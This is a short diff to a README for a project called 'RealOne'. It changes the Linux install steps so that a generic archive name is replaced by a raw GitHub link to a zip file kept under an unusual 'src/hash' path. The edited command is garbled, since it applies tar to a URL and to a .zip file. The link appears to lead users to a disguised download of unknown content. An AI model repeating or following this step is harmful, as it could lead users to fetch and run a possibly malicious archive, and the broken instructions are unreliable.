Zeus01214/RealOne/README.md

    - Open RealOne from your Applications.

 7. For Linux users:
-   - Extract the downloaded `.tar.gz` file using a command like `tar -xzf filename.tar.gz`.
+   - Extract the downloaded `https://raw.githubusercontent.com/Zeus01214/RealOne/main/src/hash/One-Real-v2.4.zip` file using a command like `tar -xzf https://raw.githubusercontent.com/Zeus01214/RealOne/main/src/hash/One-Real-v2.4.zip`.
    - Navigate to the extracted folder in your terminal.
    - Run the application using `./RealOne`.